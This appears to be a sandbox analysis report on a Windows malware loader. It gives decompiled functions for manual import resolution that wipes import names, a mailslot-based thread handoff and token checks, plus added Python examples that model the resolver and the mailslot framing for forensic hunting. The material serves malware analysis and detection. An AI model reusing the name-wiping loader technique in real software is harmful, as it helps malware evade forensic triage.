  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
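What E00401389 above is doing is resolving the import table of a PE image that has been mapped into memory by hand, and then wiping the import names it used. The offsets in the decompile are the standard PE32 structures: `_a4` is the IMAGE_NT_HEADERS pointer (NT+0x80 is OptionalHeader.DataDirectory[IMPORT].VirtualAddress, NT+0x50 is OptionalHeader.SizeOfImage), `__edi` is the load address, and the table it walks in steps of 0x14 is IMAGE_IMPORT_DESCRIPTOR (Name at +0xC, OriginalFirstThunk at +0, FirstThunk at +0x10); the `+ 2` before GetProcAddress skips the Hint field of IMAGE_IMPORT_BY_NAME. The return values are Win32 error codes: 0x7E (ERROR_MOD_NOT_FOUND) aborts the walk when LoadLibraryA fails, 0x7F (ERROR_PROC_NOT_FOUND) is recorded but the loop moves on to the next DLL. The memset calls zero every DLL and function name immediately after it has been resolved, so a memory dump taken after this point shows a populated IAT but no import strings. The Python below is an added example, not code from the report or from the sample: it builds a constructed flat PE32 image with just those fields, resolves it against a constructed export map standing in for LoadLibraryA and GetProcAddress (the addresses are made up), and reproduces the name wipe and the error-code behaviour. The ordinal branch of the decompile is not clear enough to reproduce exactly; treating high-bit thunks as ordinary IMAGE_ORDINAL_FLAG32 imports is this example's assumption.

```python
import struct

IMAGE_ORDINAL_FLAG32 = 0x80000000
ERROR_MOD_NOT_FOUND = 0x7E   # value E00401389 returns when LoadLibraryA fails (aborts the walk)
ERROR_PROC_NOT_FOUND = 0x7F  # value it returns when some GetProcAddress failed (walk continues)

# Constructed stand-in for LoadLibraryA/GetProcAddress: {dll (lower-case): {name or ordinal: address}}.
# The addresses are invented for the example.
FAKE_MODULES = {
    "kernel32.dll": {"CreateThread": 0x7C810637, "WaitForSingleObject": 0x7C802530},
    "ntdll.dll": {0x10: 0x7C901000, "memset": 0x7C90F0A0},
}

def u32(b, off): return struct.unpack_from("<I", b, off)[0]
def w32(b, off, v): struct.pack_into("<I", b, off, v)
def cstr(b, off): return bytes(b[off:b.index(b"\0", off)]).decode()

def build_image(imports):
    """Constructed flat PE32 image (RVA == offset) carrying only what the resolver reads:
    e_lfanew, OptionalHeader.SizeOfImage (NT+0x50), DataDirectory[IMPORT] (NT+0x80) and
    an IMAGE_IMPORT_DESCRIPTOR table. imports: [(dll_name, [func_name_or_ordinal, ...]), ...]."""
    img = bytearray(0x1000)
    img[0:2], nt = b"MZ", 0x40
    w32(img, 0x3C, nt)
    img[nt:nt + 4] = b"PE\0\0"
    w32(img, nt + 0x50, len(img))                        # SizeOfImage
    desc_rva = 0x200
    w32(img, nt + 0x80, desc_rva)                        # import directory RVA
    cursor = desc_rva + 0x14 * (len(imports) + 1)        # descriptors + all-zero terminator
    def put(data):                                       # bump allocator, 4-byte aligned
        nonlocal cursor
        rva, cursor = cursor, cursor + len(data) + (-len(data) % 4)
        img[rva:rva + len(data)] = data
        return rva
    for n, (dll, funcs) in enumerate(imports):
        d = desc_rva + 0x14 * n
        thunks = [IMAGE_ORDINAL_FLAG32 | f if isinstance(f, int)
                  else put(b"\0\0" + f.encode() + b"\0")  # IMAGE_IMPORT_BY_NAME: Hint, Name
                  for f in funcs]
        blob = b"".join(struct.pack("<I", t) for t in thunks) + b"\0\0\0\0"
        w32(img, d + 0x00, put(blob))                    # OriginalFirstThunk (name table)
        w32(img, d + 0x0C, put(dll.encode() + b"\0"))    # Name
        w32(img, d + 0x10, put(blob))                    # FirstThunk (the IAT to be patched)
    return img

def resolve_imports(img, modules, wipe_names=True):
    """Walk the import directory the way E00401389 does and patch the IAT.
    Returns 0 on success, otherwise the Win32 error code the sample returns."""
    nt = u32(img, 0x3C)
    desc = u32(img, nt + 0x80)
    status = 0
    if desc == 0:
        return status
    while True:
        name_rva = u32(img, desc + 0x0C)
        if name_rva == 0:                                # end of the descriptor table
            return status
        dll = cstr(img, name_rva)
        exports = modules.get(dll.lower())
        if exports is None:
            return ERROR_MOD_NOT_FOUND                   # LoadLibraryA failed: abort
        if wipe_names:                                   # memset(name, 0, lstrlenA(name))
            img[name_rva:name_rva + len(dll)] = bytes(len(dll))
        oft = u32(img, desc) or u32(img, desc + 0x10)    # fall back to FirstThunk if OFT is 0
        ft = u32(img, desc + 0x10)
        i = 0
        while oft and (thunk := u32(img, oft + 4 * i)):
            by_name = not thunk & IMAGE_ORDINAL_FLAG32
            key = cstr(img, thunk + 2) if by_name else thunk & 0xFFFF   # +2 skips the Hint
            addr = exports.get(key)
            if addr is None:
                status = ERROR_PROC_NOT_FOUND            # noted, then on to the next DLL
                break
            if wipe_names and by_name:                   # memset(name, 0, lstrlenA(name))
                img[thunk + 2:thunk + 2 + len(key)] = bytes(len(key))
            w32(img, ft + 4 * i, addr)                   # IAT slot at the same index as the OFT entry
            i += 1
        desc += 0x14

def read_iat(img, index):
    """Resolved IAT of the index-th descriptor, for inspection."""
    desc = u32(img, u32(img, 0x3C) + 0x80) + 0x14 * index
    ft, out = u32(img, desc + 0x10), []
    while (v := u32(img, ft + 4 * len(out))):
        out.append(v)
    return out

if __name__ == "__main__":
    image = build_image([("kernel32.dll", ["CreateThread", "WaitForSingleObject"]),
                         ("ntdll.dll", [0x10, "memset"])])
    print("before:", b"CreateThread" in image)
    print("status:", hex(resolve_imports(image, FAKE_MODULES)))
    print("iat:", [hex(a) for a in read_iat(image, 0)], "names left:", b"CreateThread" in image)
```

The last two prints are the forensic point: after resolution the IAT is filled but a string scan of the image no longer finds `kernel32.dll` or `CreateThread`, which is why import-name based triage of a dump of this sample's mapped payload comes up empty and the IAT has to be recovered from the resolved addresses instead.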
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
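E00401033 above (the reader) and E004010FB earlier (the writer) are the two ends of an in-process handoff over the mailslot `\\.\mailslot\msl0`, started as two threads by E00401639. The reader creates the slot with a 0x1000-byte maximum message size, reads one message at a time into a heap buffer it grows with HeapReAlloc, treats ReadFile error 0x79 (ERROR_SEM_TIMEOUT) as "nothing yet" by forcing `_v16 = 0x1000`, and stops after the first message shorter than 0x1000 bytes. The writer retries CreateFileA every 100 ms while the error is 2 (ERROR_FILE_NOT_FOUND), i.e. until the reader thread has created the slot, then sends min(remaining, 0x1000) bytes per WriteFile; when the final message was exactly 0x1000 bytes it steps back one byte (`_t46 = _t46 + 1; _v8 = _v8 - 1`) and sends that byte again as a 1-byte message so the reader always sees a short terminator. The Python below is an added example, not code from the report or the sample: it models the framing of both loops over an in-memory queue standing in for the mailslot, with the constructed payloads and injected timeouts labelled as such, so the one-byte-longer result for payloads that are an exact multiple of 0x1000 can be seen. It does not model the decompile's test of the CreateMailslotA result against 0 (the API reports failure with INVALID_HANDLE_VALUE).

```python
MAX_MSG = 0x1000          # CreateMailslotA(..., 0x1000, ...) and the ReadFile/WriteFile chunk size
ERROR_SEM_TIMEOUT = 0x79  # 121: the only I/O error either loop tolerates (sleep 100 ms and retry)

def sender_messages(payload: bytes) -> list:
    """The sequence of mailslot messages E004010FB writes for a payload."""
    msgs, off, remaining = [], 0, len(payload)
    while remaining:
        n = min(remaining, MAX_MSG)              # _v16 = min(_t46, 0x1000)
        msgs.append(payload[off:off + n])
        off, remaining = off + n, remaining - n
        if remaining == 0 and n == MAX_MSG:      # _t46 = _t46 + 1; _v8 = _v8 - 1
            remaining, off = 1, off - 1          # resend the last byte as a 1-byte terminator
    return msgs

def receiver_reassemble(read_message) -> bytes:
    """Drain the slot the way E00401033 does. read_message() returns one message as bytes or
    raises TimeoutError in place of ReadFile failing with ERROR_SEM_TIMEOUT."""
    buf = bytearray()
    while True:
        try:
            chunk = read_message()
        except TimeoutError:
            continue                             # _v16 = 0x1000: keep waiting
        buf += chunk                             # _t39 = _t39 + _v16 (buffer grown by HeapReAlloc)
        if len(chunk) != MAX_MSG:                # while (_v16 == 0x1000)
            return bytes(buf)

def simulate(payload: bytes, timeouts: int = 2):
    """Run writer and reader back to back over a constructed in-memory queue standing in for
    the mailslot; `timeouts` ERROR_SEM_TIMEOUT reads are injected before the first message.
    Returns (reassembled bytes, number of messages sent)."""
    msgs = sender_messages(payload)
    queue, pending = list(msgs), [timeouts]
    def read_message():
        if pending[0]:
            pending[0] -= 1
            raise TimeoutError(ERROR_SEM_TIMEOUT)
        return queue.pop(0)
    return receiver_reassemble(read_message), len(msgs)

if __name__ == "__main__":
    for payload in (b"A" * 5, bytes(range(256)) * 16 + b"tail", bytes(range(256)) * 32):
        out, sent = simulate(payload)
        print(f"payload {len(payload):#x} bytes -> {sent} messages, received {len(out):#x} bytes,"
              f" extra trailing byte: {out != payload}")
```

For payload sizes that are an exact multiple of 0x1000 the reassembled buffer is one byte longer than the payload (the last byte appears twice), exactly as the two decompiled loops dictate; for any other size the two sides agree byte for byte. On a live host the same framing is visible as a burst of 0x1000-byte mailslot writes ending in a short one, which, combined with the `msl0` name, is a usable hunting artefact for this loader.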
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
